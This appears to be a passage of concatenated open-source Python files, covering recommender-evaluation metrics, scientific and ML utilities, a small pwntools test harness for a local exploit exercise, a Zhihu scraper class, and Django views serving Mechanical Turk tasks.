if nrel == 0:
return None
if k is not None:
nrel = min(nrel, k)
recs = recs.iloc[:k]
ngood = recs['item'].isin(truth.index).sum()
return ngood / nrel
@bulk_impl(recall)
def _bulk_recall(recs, truth, k=None):
tcounts = truth.reset_index().groupby('LKTruthID')['item'].count()
if k is not None:
_log.debug('truncating to k for recall')
tcounts = np.minimum(tcounts, k)
recs = recs[recs['rank'] <= k]
good = recs.join(truth, on=['LKTruthID', 'item'], how='inner')
gcounts = good.groupby('LKRecID')['item'].count()
# we need all lists, because some might have no truth (oops), some no recs (also oops)
lists = recs[['LKRecID', 'LKTruthID']].drop_duplicates()
scores = lists.join(gcounts.to_frame('ngood'), on='LKRecID', how='left')
scores['ngood'].fillna(0, inplace=True)
scores = scores.join(tcounts.to_frame('nrel'), on='LKTruthID', how='left')
scores = scores.set_index('LKRecID')
return scores['ngood'] / scores['nrel']
def recip_rank(recs, truth, k=None):
"""
Compute the reciprocal rank of the first relevant item in a list of recommendations.
If no elements are relevant, the reciprocal rank is 0.
This metric has a bulk equivalent.
"""
if k is not None:
recs = recs.iloc[:k]
good = recs['item'].isin(truth.index)
npz, = np.nonzero(good.to_numpy())
if len(npz):
return 1.0 / (npz[0] + 1.0)
else:
return 0.0
@bulk_impl(recip_rank)
def _bulk_rr(recs, truth, k=None):
# find everything with truth
if k is not None:
recs = recs[recs['rank'] <= k]
joined = recs.join(truth, on=['LKTruthID', 'item'], how='inner')
# compute min ranks
ranks = joined.groupby('LKRecID')['rank'].agg('min')
# reciprocal ranks
scores = 1.0 / ranks
_log.debug('have %d scores with MRR %.3f', len(scores), scores.mean())
# fill with zeros
rec_ids = recs['LKRecID'].unique()
scores = scores.reindex(rec_ids, fill_value=0.0)
_log.debug('filled to get %s scores w/ MRR %.3f', len(scores), scores.mean())
# and we're done
return scores
def _dcg(scores, discount=np.log2):
"""
Compute the Discounted Cumulative Gain of a series of recommended items with rating scores.
These should be relevance scores; they can be :math:`{0,1}` for binary relevance data.
This is not a true top-N metric, but is a utility function for other metrics.
Args:
scores(array-like):
The utility scores of a list of recommendations, in recommendation order.
discount(ufunc):
the rank discount function. Each item's score will be divided the discount of its rank,
if the discount is greater than 1.
Returns:
double: the DCG of the scored items.
"""
scores = np.nan_to_num(scores)
ranks = np.arange(1, len(scores) + 1)
disc = discount(ranks)
np.maximum(disc, 1, out=disc)
np.reciprocal(disc, out=disc)
return np.dot(scores, disc)
def _fixed_dcg(n, discount=np.log2):
ranks = np.arange(1, n+1)
disc = discount(ranks)
disc = np.maximum(disc, 1)
disc = np.reciprocal(disc)
return np.sum(disc)
def dcg(recs, truth, discount=np.log2):
"""
Compute the **unnormalized** discounted cumulative gain.
Discounted cumultative gain is computed as:
.. math::
\\begin{align*}
\\mathrm{DCG}(L,u) & = \\sum_{i=1}^{|L|} \\frac{r_{ui}}{d(i)}
\\end{align*}
Args:
recs: The recommendation list.
truth: The user's test data.
discount(ufunc):
The rank discount function. Each item's score will be divided the discount of its rank,
if the discount is greater than 1.
"""
tpos = truth.index.get_indexer(recs['item'])
tgood = tpos >= 0
if 'rating' in truth.columns:
# make an array of ratings for this rec list
r_rates = truth['rating'].values[tpos]
r_rates[tpos < 0] = 0
achieved = _dcg(r_rates, discount)
else:
achieved = _dcg(tgood, discount)
return achieved
def ndcg(recs, truth, discount=np.log2, k=None):
"""
Compute the normalized discounted cumulative gain.
Discounted cumultative gain is computed as:
.. math::
\\begin{align*}
\\mathrm{DCG}(L,u) & = \\sum_{i=1}^{|L|} \\frac{r_{ui}}{d(i)}
\\end{align*}
This is then normalized as follows:
.. math::
\\begin{align*}
\\mathrm{nDCG}(L, u) & = \\frac{\\mathrm{DCG}(L,u)}{\\mathrm{DCG}(L_{\\mathrm{ideal}}, u)}
\\end{align*}
Args:
recs: The recommendation list.
truth: The user's test data.
discount(ufunc):
The rank discount function. Each item's score will be divided the discount of its rank,
if the discount is greater than 1.
"""
tpos = truth.index.get_indexer(recs['item'])
if k is not None:
recs = recs.iloc[:k]
if 'rating' in truth.columns:
i_rates = np.sort(truth.rating.values)[::-1]
if k is not None:
i_rates = i_rates[:k]
ideal = _dcg(i_rates, discount)
# make an array of ratings for this rec list
r_rates = truth['rating'].values[tpos]
r_rates[tpos < 0] = 0
achieved = _dcg(r_rates, discount)
else:
ntrue = len(truth)
if k is not None and ntrue > k:
ntrue = k
ideal = _fixed_dcg(ntrue, discount)
tgood = tpos >= 0
achieved = _dcg(tgood, discount)
return achieved / ideal
@bulk_impl(ndcg)
def _bulk_ndcg(recs, truth, discount=np.log2, k=None):
if 'rating' not in truth.columns:
truth = truth.assign(rating=np.ones(len(truth), dtype=np.float32))
ideal = truth.groupby(level='LKTruthID')['rating'].rank(method='first', ascending=False)
if k is not None:
ideal = ideal[ideal <= k]
ideal = discount(ideal)
ideal = np.maximum(ideal, 1)
ideal = truth['rating'] / ideal
ideal = ideal.groupby(level='LKTruthID').sum()
ideal.name = 'ideal'
list_ideal = recs[['LKRecID', 'LKTruthID']].drop_duplicates()
list_ideal = list_ideal.join(ideal, on='LKTruthID', how='left')
list_ideal = list_ideal.set_index('LKRecID')
if k is not None:
recs = recs[recs['rank'] <= k]
rated = recs.join(truth, on=['LKTruthID', 'item'], how='inner')
rd = discount(rated['rank'])
rd = np.maximum(rd, 1)
rd = rated['rating'] / rd
rd = rated[['LKRecID']].assign(util=rd)
dcg = rd.groupby(['LKRecID'])['util'].sum().reset_index(name='dcg')
dcg = dcg.set_index('LKRecID')
dcg = dcg.join(list_ideal, how='outer')
dcg['ndcg'] = dcg['dcg'].fillna(0) / dcg['ideal']
return dcg['ndcg']
|
accounts/admin.py | mirsazzathossain/SPMS-Project | 190 | 12690576 | <reponame>mirsazzathossain/SPMS-Project
from django.contrib import admin
from .models import User
admin.site.register(User)
|
ML/keras/augmentation/augmentation_example.py | saneravi/ML_Stuff | 209 | 12690608 | <gh_stars>100-1000
#!/usr/bin/env python
import matplotlib.pyplot as plt
from keras.datasets import cifar10
from keras.preprocessing.image import ImageDataGenerator
(X_train_raw, y_train_raw), (X_test, y_test) = cifar10.load_data()
n = 10
X_train = X_train_raw[:n] / 255.
y_train = y_train_raw[:n]
da = {}
da['hue_shift'] = 0
da['saturation_scale'] = 0
da['saturation_shift'] = 0
da['value_scale'] = 0
da['value_shift'] = 0
hsv_augmentation = (da['hue_shift'],
da['saturation_scale'],
da['saturation_shift'],
da['value_scale'],
da['value_shift'])
datagen = ImageDataGenerator(
# set input mean to 0 over the dataset
featurewise_center=False,
# set each sample mean to 0
samplewise_center=False,
# divide inputs by std of the dataset
featurewise_std_normalization=False,
# divide each input by its std
samplewise_std_normalization=False,
zca_whitening=False,
# randomly rotate images in the range (degrees, 0 to 180)
rotation_range=0,
# randomly shift images horizontally (fraction of total width)
width_shift_range=0,
# randomly shift images vertically (fraction of total height)
height_shift_range=0,
horizontal_flip=False,
vertical_flip=False,
hsv_augmentation=None,
zoom_range=0,
shear_range=0,
channel_shift_range=0)
generator = datagen.flow(X_train, y_train, batch_size=n, shuffle=False)
batch = next(generator)
fig = plt.figure(figsize=(4, 2))
for i in range(n):
ax = fig.add_subplot(n, 2, 2 * i + 1)
ax.set_axis_off()
ax.imshow(X_train[i]) # non-augmented
ax = fig.add_subplot(n, 2, 2 * i + 2)
ax.set_axis_off()
# batch[0][i] = datagen.standardize(batch[0][i])
ax.imshow(batch[0][i]) # augmented
plt.show()
|
tests/test_diffeq/test_perturbed/test_step/test_perturbedstepsolution.py | mmahsereci/probnum | 226 | 12690611 | import numpy as np
import pytest
from scipy.integrate._ivp import rk
import probnum.problems.zoo.diffeq as diffeq_zoo
from probnum import _randomvariablelist, diffeq
@pytest.fixture
def steprule():
return diffeq.stepsize.AdaptiveSteps(0.1, atol=1e-4, rtol=1e-4)
@pytest.fixture
def perturbed_solution(steprule):
y0 = np.array([0.1, 0.1])
ode = diffeq_zoo.lotkavolterra(t0=0.0, tmax=1.0, y0=y0)
rng = np.random.default_rng(seed=1)
testsolver = diffeq.perturbed.scipy_wrapper.WrappedScipyRungeKutta(
rk.RK45, steprule=steprule
)
sol = diffeq.perturbed.step.PerturbedStepSolver(
rng=rng,
solver=testsolver,
noise_scale=0.1,
perturb_function=diffeq.perturbed.step.perturb_uniform,
)
return sol.solve(ode)
def test_states(perturbed_solution):
assert isinstance(
perturbed_solution.states, _randomvariablelist._RandomVariableList
)
def test_call(perturbed_solution):
"""Test for continuity of the dense output.
Small changes of the locations should come with small changes of the
states.
"""
np.testing.assert_allclose(
perturbed_solution(perturbed_solution.locations[0:]).mean,
perturbed_solution.states[0:].mean,
atol=1e-14,
rtol=1e-14,
)
np.testing.assert_allclose(
perturbed_solution(perturbed_solution.locations[0:-1] + 1e-14).mean,
perturbed_solution(perturbed_solution.locations[0:-1]).mean,
atol=1e-12,
rtol=1e-12,
)
np.testing.assert_allclose(
perturbed_solution(perturbed_solution.locations[1:] - 1e-14).mean,
perturbed_solution(perturbed_solution.locations[1:]).mean,
atol=1e-12,
rtol=1e-12,
)
def test_len(perturbed_solution):
np.testing.assert_allclose(
len(perturbed_solution),
len(perturbed_solution.locations),
atol=1e-14,
rtol=1e-14,
)
def test_getitem(perturbed_solution):
np.testing.assert_allclose(
perturbed_solution.interpolants[1](perturbed_solution.locations[1]),
perturbed_solution[1].mean,
atol=1e-14,
rtol=1e-14,
)
|
examples/docs_snippets_crag/docs_snippets_crag_tests/concepts_tests/partitions_schedules_sensors_tests/test_partitioned_job_test.py | dagster-io/dagster | 4,606 | 12690616 | from docs_snippets_crag.concepts.partitions_schedules_sensors.partitioned_job_test import ( # pylint: disable=unused-import
test_do_stuff_partitioned,
)
|
egg/zoo/simple_autoenc/features.py | vengalraoguttha/EGG | 254 | 12690670 | # Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import pickle
import numpy as np
import torch
import torch.nn.parallel
import torch.utils.data as data
class _OneHotIterator:
"""
>>> it_1 = _OneHotIterator(n_features=128, n_batches_per_epoch=2, batch_size=64, seed=1)
>>> it_2 = _OneHotIterator(n_features=128, n_batches_per_epoch=2, batch_size=64, seed=1)
>>> list(it_1)[0][0].allclose(list(it_2)[0][0])
True
>>> it = _OneHotIterator(n_features=8, n_batches_per_epoch=1, batch_size=4)
>>> data = list(it)
>>> len(data)
1
>>> batch = data[0]
>>> x, y = batch
>>> x.size()
torch.Size([4, 8])
>>> x.sum(dim=1)
tensor([1., 1., 1., 1.])
"""
def __init__(self, n_features, n_batches_per_epoch, batch_size, seed=None):
self.n_batches_per_epoch = n_batches_per_epoch
self.n_features = n_features
self.batch_size = batch_size
self.probs = np.ones(n_features) / n_features
self.batches_generated = 0
self.random_state = np.random.RandomState(seed)
def __iter__(self):
return self
def __next__(self):
if self.batches_generated >= self.n_batches_per_epoch:
raise StopIteration()
batch_data = self.random_state.multinomial(1, self.probs, size=self.batch_size)
self.batches_generated += 1
return torch.from_numpy(batch_data).float(), torch.zeros(1)
class OneHotLoader(torch.utils.data.DataLoader):
"""
>>> data_loader = OneHotLoader(n_features=8, batches_per_epoch=3, batch_size=2, seed=1)
>>> epoch_1 = []
>>> for batch in data_loader:
... epoch_1.append(batch)
>>> [b[0].size() for b in epoch_1]
[torch.Size([2, 8]), torch.Size([2, 8]), torch.Size([2, 8])]
>>> data_loader_other = OneHotLoader(n_features=8, batches_per_epoch=3, batch_size=2)
>>> all_equal = True
>>> for a, b in zip(data_loader, data_loader_other):
... all_equal = all_equal and (a[0] == b[0]).all()
>>> all_equal.item()
0
"""
def __init__(self, n_features, batches_per_epoch, batch_size, seed=None):
self.seed = seed
self.batches_per_epoch = batches_per_epoch
self.n_features = n_features
self.batch_size = batch_size
def __iter__(self):
if self.seed is None:
seed = np.random.randint(0, 2 ** 32)
else:
seed = self.seed
return _OneHotIterator(
n_features=self.n_features,
n_batches_per_epoch=self.batches_per_epoch,
batch_size=self.batch_size,
seed=seed,
)
|
dnanexus/shell/resources/usr/local/lib/python2.7/dist-packages/MACS2/IO/BinKeeper.py | strattan/test-merge2 | 108 | 12690684 | # Time-stamp: <2011-03-14 17:52:00 Tao Liu>
"""Module Description: BinKeeper for Wiggle-like tracks.
Copyright (c) 2008 <NAME> <<EMAIL>>
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD License (see the file COPYING included with
the distribution).
@status: experimental
@version: $Revision$
@author: <NAME>
@contact: <EMAIL>
"""
# ------------------------------------
# python modules
# ------------------------------------
import sys
import re
from bisect import insort,bisect_left,bisect_right,insort_right
from array import array
# ------------------------------------
# constants
# ------------------------------------
# to determine the byte size
if array('H',[1]).itemsize == 2:
BYTE2 = 'H'
else:
raise Exception("BYTE2 type cannot be determined!")
if array('I',[1]).itemsize == 4:
BYTE4 = 'I'
elif array('L',[1]).itemsize == 4:
BYTE4 = 'L'
else:
raise Exception("BYTE4 type cannot be determined!")
if array('f',[1]).itemsize == 4:
FBYTE4 = 'f'
elif array('d',[1]).itemsize == 4:
FBYTE4 = 'd'
else:
raise Exception("BYTE4 type cannot be determined!")
# ------------------------------------
# Misc functions
# ------------------------------------
# ------------------------------------
# Classes
# ------------------------------------
class BinKeeperI:
"""BinKeeper keeps point data from a chromosome in a bin list.
Example:
>>> from taolib.CoreLib.Parser import WiggleIO
>>> w = WiggleIO('sample.wig')
>>> bk = w.build_binKeeper()
>>> bk['chrI'].pp2v(1000,2000) # to extract values in chrI:1000..2000
"""
def __init__ (self,binsize=8000,chromosomesize=1e9):
"""Initializer.
Parameters:
binsize : size of bin in Basepair
chromosomesize : size of chromosome, default is 1G
"""
self.binsize = binsize
self.binnumber = int(chromosomesize/self.binsize)+1
self.cage = []
a = self.cage.append
for i in xrange(self.binnumber):
a([array(BYTE4,[]),array(FBYTE4,[])])
def add ( self, p, value ):
"""Add a position into BinKeeper.
Note: position must be sorted before adding. Otherwise, pp2v
and pp2p will not work.
"""
bin = p/self.binsize
self.cage[bin][0].append(p)
self.cage[bin][1].append(value)
def p2bin (self, p ):
"""Return the bin index for a position.
"""
return p/self.binsize
def p2cage (self, p):
"""Return the bin containing the position.
"""
return self.cage[p/self.binsize]
def __pp2cages (self, p1, p2):
assert p1<=p2
bin1 = self.p2bin(p1)
bin2 = self.p2bin(p2)+1
t = [array(BYTE4,[]),array(FBYTE4,[])]
for i in xrange(bin1,bin2):
t[0].extend(self.cage[i][0])
t[1].extend(self.cage[i][1])
return t
def pp2p (self, p1, p2):
"""Give the position list between two given positions.
Parameters:
p1 : start position
p2 : end position
Return Value:
list of positions between p1 and p2.
"""
(ps,vs) = self.__pp2cages(p1,p2)
p1_in_cages = bisect_left(ps,p1)
p2_in_cages = bisect_right(ps,p2)
return ps[p1_in_cages:p2_in_cages]
def pp2v (self, p1, p2):
"""Give the value list between two given positions.
Parameters:
p1 : start position
p2 : end position
Return Value:
list of values whose positions are between p1 and p2.
"""
(ps,vs) = self.__pp2cages(p1,p2)
p1_in_cages = bisect_left(ps,p1)
p2_in_cages = bisect_right(ps,p2)
return vs[p1_in_cages:p2_in_cages]
def pp2pv (self, p1, p2):
"""Give the (position,value) list between two given positions.
Parameters:
p1 : start position
p2 : end position
Return Value:
list of (position,value) between p1 and p2.
"""
(ps,vs) = self.__pp2cages(p1,p2)
p1_in_cages = bisect_left(ps,p1)
p2_in_cages = bisect_right(ps,p2)
return zip(ps[p1_in_cages:p2_in_cages],vs[p1_in_cages:p2_in_cages])
class BinKeeperII:
"""BinKeeperII keeps non-overlapping interval data from a chromosome in a bin list.
This is especially designed for bedGraph type data.
"""
def __init__ (self,binsize=8000,chromosomesize=1e9):
"""Initializer.
Parameters:
binsize : size of bin in Basepair
chromosomesize : size of chromosome, default is 1G
"""
self.binsize = binsize
self.binnumber = int(chromosomesize/self.binsize)+1
self.cage = []
a = self.cage.append
for i in xrange(self.binnumber):
a([array(BYTE4,[]),array(BYTE4,[]),array(FBYTE4,[])])
def add ( self, startp, endp, value ):
"""Add an interval data into BinKeeper.
Note: position must be sorted before adding. Otherwise, pp2v
and pp2p will not work.
"""
startbin = startp/self.binsize
endbin = endp/self.binsize
if startbin == endbin:
# some intervals may only be within a bin
j = bisect.bisect_left(self.cage[startbin][0],startp)
self.cage[startbin][0].insert(j,startp)
self.cage[startbin][1].insert(j,endp)
self.cage[startbin][2].insert(j,value)
else:
# some intervals may cover the end of bins
# first bin
j = bisect.bisect_left(self.cage[startbin][0],startp)
self.cage[startbin][0].insert(j,startp)
self.cage[startbin][1].insert(j,(startbin+1)*self.binsize)
self.cage[startbin][2].insert(j,value)
# other bins fully covered
for i in xrange(startbin+1,endbin):
p = i*self.binsize
j = bisect.bisect_left(self.cage[startbin][0],p)
self.cage[startbin][0].insert(j,p)
self.cage[startbin][1].insert(j,(i+1)*self.binsize)
self.cage[startbin][2].insert(j,value)
insort_right(self.cage[i][0],i*self.binsize)
insort_right(self.cage[i][1],(i+1)*self.binsize)
insort_right(self.cage[i][2],value)
# last bin -- the start of this bin should be covered
insort_right(self.cage[endbin][0],endbin*self.binsize)
insort_right(self.cage[endbin][1],endp)
insort_right(self.cage[endbin][2],value)
def p2bin (self, p ):
"""Given a position, return the bin index for a position.
"""
return p/self.binsize
def p2cage (self, p):
"""Given a position, return the bin containing the position.
"""
return self.cage[p/self.binsize]
def pp2cages (self, p1, p2):
"""Given an interval, return the bins containing this interval.
"""
assert p1<=p2
bin1 = self.p2bin(p1)
bin2 = self.p2bin(p2)
t = [array(BYTE4,[]),array(BYTE4,[]),array(FBYTE4,[])]
for i in xrange(bin1,bin2+1):
t[0].extend(self.cage[i][0])
t[1].extend(self.cage[i][1])
t[2].extend(self.cage[i][2])
return t
def pp2intervals (self, p1, p2):
"""Given an interval, return the intervals list between two given positions.
Parameters:
p1 : start position
p2 : end position
Return Value:
A list of intervals start and end positions (tuple) between p1 and p2.
* Remember, I assume all intervals saved in this BinKeeperII
are not overlapping, so if there is some overlap, this
function will not work as expected.
"""
(startposs,endposs,vs) = self.pp2cages(p1,p2)
p1_in_cages = bisect_left(startposs,p1)
p2_in_cages = bisect_right(endposs,p2)
output_startpos_list = startposs[p1_in_cages:p2_in_cages]
output_endpos_list = endposs[p1_in_cages:p2_in_cages]
# check if the bin (p1_in_cages-1) covers p1
if p1 < endposs[p1_in_cages-1]:
# add this interval
output_startpos_list = array(BYTE4,[p1,])+output_startpos_list
output_endpos_list = array(BYTE4,[endposs[p1_in_cages-1],])+output_endpos_list
# check if the bin (p2_in_cages+1) covers p2
if p2 > startposs[p2_in_cages+1]:
# add this interval
output_startpos_list = array(BYTE4,[startposs[p2_in_cages+1],])+output_startpos_list
output_endpos_list = array(BYTE4,[p2,])+output_endpos_list
return zip(output_startpos_list,output_endpos_list)
def pp2pvs (self, p1, p2):
"""Given an interval, return the values list between two given positions.
Parameters:
p1 : start position
p2 : end position
Return Value:
A list of start, end positions, values (tuple) between p1 and
p2. Each value represents the value in an interval. Remember
the interval length and positions are lost in the output.
* Remember, I assume all intervals saved in this BinKeeperII
are not overlapping, so if there is some overlap, this
function will not work as expected.
"""
(startposs,endposs,vs) = self.pp2cages(p1,p2)
p1_in_cages = bisect_left(startposs,p1)
p2_in_cages = bisect_right(endposs,p2)
output_startpos_list = startposs[p1_in_cages:p2_in_cages]
output_endpos_list = endposs[p1_in_cages:p2_in_cages]
output_value_list = vs[p1_in_cages:p2_in_cages]
# print p1_in_cages,p2_in_cages
# print vs
print output_startpos_list
print output_endpos_list
print output_value_list
# check if the bin (p1_in_cages-1) covers p1
if p1_in_cages-1 >= 0 and p1 < self.cage[p1_in_cages-1][1]:
# add this interval
output_startpos_list = array(BYTE4,[p1,])+output_startpos_list
output_endpos_list = array(BYTE4,[self.cage[p1_in_cages-1][1],])+output_endpos_list
output_value_list = array(BYTE4,[self.cage[p1_in_cages-1][2],])+output_value_list
# check if the bin (p2_in_cages+1) covers p2
#print p2_in_cages+1,len(self.cage)
#print p2, self.cage[p2_in_cages+1][0]
if p2_in_cages+1 < len(self.cage) and p2 > self.cage[p2_in_cages+1][0]:
# add this interval
output_startpos_list = output_startpos_list+array(BYTE4,[self.cage[p2_in_cages+1][0],])
output_endpos_list = output_endpos_list+array(BYTE4,[p2,])
output_value_list = output_value_list+array(BYTE4,[self.cage[p2_in_cages+1][2],])
print output_startpos_list
print output_endpos_list
print output_value_list
return zip(output_startpos_list,output_endpos_list,output_value_list)
|
srop-examples/srop2/harness.py | security-notes/pwntools-write-ups | 456 | 12690693 | #!/usr/bin/env python
from pwn import *
import os, signal
context.log_level = 1000
with tempfile.NamedTemporaryFile() as fd:
s = randoms(12)+"\n"
fd.write(s)
fd.flush()
try:
p = process(["python", "doit.py", "FLAG=%s"%fd.name])
#p.sendline(fd.name)
flagenc = p.recvline(timeout=5).strip()
if flagenc == b64e(s):
print "ok"
else:
print "not ok"
finally:
p.close()
|
zhihu/activity.py | enjoy233/zhihu-py3 | 1,321 | 12690733 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from datetime import datetime
from .acttype import ActType
from .answer import Answer
from .author import Author, ANONYMOUS
from .collection import Collection
from .column import Column
from .common import *
from .post import Post
from .question import Question
from .topic import Topic
class Activity:
"""用户动态类,请使用Author.activities获取."""
def __init__(self, act, session, author):
"""创建用户动态类实例.
:param bs4.element.Tag act: 表示用户动态的页面元素
:param Session session: 使用的网络会话
:param Author author: Activity 所属的用户对象
:return: 用户动态对象
:rtype: Activity
:说明:
根据Activity.type不同可以获取不同属性,具体请看 :class:`.ActType`
"""
self._session = session
self._author = author
self._type = ActType.from_str(act.attrs['data-type-detail'])
useless_tag = act.div.find('a', class_='zg-link')
if useless_tag is not None:
useless_tag.extract()
attribute = self._get_assemble_method(self.type)(act)
self._attr = attribute.__class__.__name__.lower()
setattr(self, self._attr, attribute)
self._time = datetime.fromtimestamp(int(act['data-time']))
@property
def type(self):
"""
:return: 用户动态类型, 具体参见 :class:`.ActType`
:rtype: class:`.ActType`
"""
return self._type
@property
def content(self):
"""获取此对象中能提供的那个属性,对应表请查看 :class:`.ActType` 类.
:return: 对象提供的对象
:rtype: Author or Question or Answer or Topic or Column or Post
"""
return getattr(self, self._attr)
@property
def time(self):
"""
:return: 返回用户执行 Activity 操作的时间
:rtype: datetime.datetime
"""
return self._time
def __find_post(self, act):
try:
column_url = act.find('a', class_='column_link')['href']
column_name = act.find('a', class_='column_link').text
column = Column(column_url, column_name, session=self._session)
except TypeError:
column = None
try:
author_tag = act.find('div', class_='author-info')
author_url = Zhihu_URL + author_tag.a['href']
author_name = author_tag.a.text
author_motto = author_tag.span.text if author_tag.span else ''
author = Author(author_url, author_name, author_motto,
session=self._session)
except TypeError:
author = ANONYMOUS
post_url = act.find('a', class_='post-link')['href']
post_title = act.find('a', class_='post-link').text
post_comment_num, post_upvote_num = self._parse_un_cn(act)
return Post(post_url, column, author, post_title,
post_upvote_num, post_comment_num,
session=self._session)
def _assemble_create_post(self, act):
return self.__find_post(act)
def _assemble_voteup_post(self, act):
return self.__find_post(act)
def _assemble_follow_column(self, act):
return Column(act.div.a['href'], act.div.a.text, session=self._session)
def _assemble_follow_topic(self, act):
topic_url = Zhihu_URL + act.div.a['href']
topic_name = act.div.a['title']
return Topic(topic_url, topic_name, session=self._session)
def _assemble_answer_question(self, act):
question_url = Zhihu_URL + re_a2q.match(
act.div.find_all('a')[-1]['href']).group(1)
question_title = act.div.find_all('a')[-1].text.strip()
question = Question(question_url, question_title, session=self._session)
answer_url = Zhihu_URL + act.div.find_all('a')[-1]['href']
answer_comment_num, answer_upvote_num = self._parse_un_cn(act)
return Answer(answer_url, question, self._author, answer_upvote_num,
session=self._session)
def _assemble_voteup_answer(self, act):
question_url = Zhihu_URL + re_a2q.match(act.div.a['href']).group(1)
question_title = act.div.a.text.strip()
question = Question(question_url, question_title, session=self._session)
try_find_author = act.find_all('a', class_='author-link',
href=re.compile('^/people/[^/]*$'))
if len(try_find_author) == 0:
author_url = None
author_name = '匿名用户'
author_motto = ''
else:
try_find_author = try_find_author[-1]
author_url = Zhihu_URL + try_find_author['href']
author_name = try_find_author.text
try_find_motto = act.find('span', class_='bio')
if try_find_motto is None:
author_motto = ''
else:
author_motto = try_find_motto['title']
author = Author(author_url, author_name, author_motto,
session=self._session)
answer_url = Zhihu_URL + act.div.a['href']
answer_comment_num, answer_upvote_num = self._parse_un_cn(act)
return Answer(answer_url, question, author, answer_upvote_num,
session=self._session)
def _assemble_ask_question(self, act):
a = act.find("a", class_="question_link")
url = Zhihu_URL + a['href']
title = a.text.strip(' \n')
return Question(url, title, session=self._session)
def _assemble_follow_question(self, act):
return Question(Zhihu_URL + act.div.a['href'], act.div.a.text.strip(),
session=self._session)
def _assemble_follow_collection(self, act):
url = act.div.a['href']
if not url.startswith('http'):
url = Zhihu_URL + url
return Collection(url, session=self._session)
def _get_assemble_method(self, act_type):
assemble_methods = {
ActType.UPVOTE_POST: self._assemble_voteup_post,
ActType.FOLLOW_COLUMN: self._assemble_follow_column,
ActType.UPVOTE_ANSWER: self._assemble_voteup_answer,
ActType.ANSWER_QUESTION: self._assemble_answer_question,
ActType.ASK_QUESTION: self._assemble_ask_question,
ActType.FOLLOW_QUESTION: self._assemble_follow_question,
ActType.FOLLOW_TOPIC: self._assemble_follow_topic,
ActType.PUBLISH_POST: self._assemble_create_post,
ActType.FOLLOW_COLLECTION: self._assemble_follow_collection
}
if act_type in assemble_methods:
return assemble_methods[act_type]
else:
raise ValueError('invalid activity type')
@staticmethod
def _parse_un_cn(act):
upvote_num = act.find('a', class_='zm-item-vote-count').text
if upvote_num.isdigit():
upvote_num = int(upvote_num)
else:
upvote_num = None
comment = act.find('a', class_='toggle-comment')
comment_text = next(comment.stripped_strings)
comment_num_match = re_get_number.match(comment_text)
comment_num = int(
comment_num_match.group(1)) if comment_num_match is not None else 0
return comment_num, upvote_num
|
server/mturk/views/external.py | paulu/opensurfaces | 137 | 12690736 | """
Tasks viewed from the mturk website nested in an iframe
"""
import json
import random
import datetime
from ua_parser import user_agent_parser
from django.conf import settings
from django.core.context_processors import csrf
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import ensure_csrf_cookie
from django.http import Http404
from django.shortcuts import render, get_object_or_404
from django.views.decorators.cache import never_cache
from common.utils import recursive_sum, recursive_dict_exclude, \
html_error_response
from mturk.models import MtHit, MtAssignment, Experiment, ExperimentWorker
from mturk.tasks import mturk_submit_task, \
increment_hit_counter_task, expire_hit_task
from mturk.utils import get_or_create_mturk_worker_from_request, \
get_content_model_prefetch, fetch_hit_contents, \
fetch_content_tuples
from common.utils import json_success_response, json_error_response
#
# View functions
#
#@staff_member_required
@never_cache
def admin_preview_task(request, experiment_id, override, hit_id=None):
if hit_id:
hit = get_object_or_404(MtHit, id=hit_id)
else:
hits = MtHit.objects \
.filter(hit_type__experiment_id=experiment_id, ) \
.order_by('-num_assignments_completed', '?')[:1]
try:
hit = hits[0]
except:
try:
e = Experiment.objects.get(id=experiment_id)
return html_error_response(
request, 'There are no HITs created for this experiment yet. '
'Experiment id: %s, slug: "%s", title: "%s".' % (
e.id, e.slug, e.new_hit_settings.title)
)
except:
return html_error_response(
request, 'This experiment does not exist. Experiment id: %s.' %
(experiment_id)
)
return external_task(
request, experiment_id=experiment_id, hit=hit, override=override)
@require_POST
def external_incompatible(request, id):
""" Increment view counter for an incompatible view """
increment_hit_counter_task.delay(id, 'incompatible_count')
return json_success_response()
@require_POST
def external_compatible(request, id):
""" Increment view counter for a compatible view """
increment_hit_counter_task.delay(id, 'compatible_count')
return json_success_response()
@ensure_csrf_cookie
<EMAIL> <-- already provieded by ATOMIC_REQUESTS
def external_task(request, experiment_id, hit=None, override=None):
"""
Renders a MTurk task, both preview and instructions.
override: either None, "inst", "task", or "tut"
"""
# override is only for staff members
#if not request.user.is_staff:
#override = None
# browser check
response = external_task_browser_check(request)
if response:
return response
# get HIT info etc
context_or_response = external_task_prepare_context(
request, experiment_id, hit, override)
if not isinstance(context_or_response, dict):
return context_or_response
else:
context = context_or_response
# handle tutorials: both GET and POST. if this returns None, then we know
# this is not a tutorial (or tutorial submission)
response = external_task_tutorial(request, context)
if response:
return response
# either task or instructions page
if request.method == 'POST':
return external_task_POST(request, context)
else:
return external_task_GET(request, context)
#
# Helper functions
#
def is_preview_request(request):
""" Return true if this is a request for a task preview """
return ('assignmentId' not in request.GET or
request.GET['assignmentId'] == 'ASSIGNMENT_ID_NOT_AVAILABLE')
def external_task_browser_check(request):
if request.method == "GET":
valid_browser = False
if 'HTTP_USER_AGENT' in request.META:
ua = user_agent_parser.Parse(request.META['HTTP_USER_AGENT'])
if ua['user_agent']['family'].lower() in ('firefox', 'chrome'):
device = ua['device']
if 'is_mobile' not in device or not device['is_mobile']:
valid_browser = True
if not valid_browser:
return html_error_response(
request, '''
This task requires Google Chrome. <br/><br/>
<a class="btn" href="http://www.google.com/chrome/"
target="_blank">Get Google Chrome</a>
''')
return None
def external_task_prepare_context(request, experiment_id, hit, override):
""" Fetch hit, experiment, assignment, worker, etc. Returns either a
dictionary on success, or a response (or exception) if there is some error.
"""
# obtain HIT
if hit is None:
if 'hitId' not in request.GET:
if request.user.is_staff:
return html_error_response(
request, 'HIT ID missing from GET parameters')
else:
raise Http404
hit_id = request.GET['hitId']
try:
hit = MtHit.objects \
.select_related(
'hit_type__experiment',
'hit_type__experiment_settings',
'hit_type__requirements') \
.get(id=hit_id)
except MtHit.DoesNotExist:
# if this HIT cannot be found, tell Amazon about it
if (override is None and
not request.user.is_staff and
'assignmentId' in request.GET and
'workerId' in request.GET and
'turkSubmitTo' in request.GET):
expire_hit_task.delay(hit_id)
raise Http404
# obtain experiment
experiment = hit.hit_type.experiment
if experiment.id != int(experiment_id):
if request.user.is_staff:
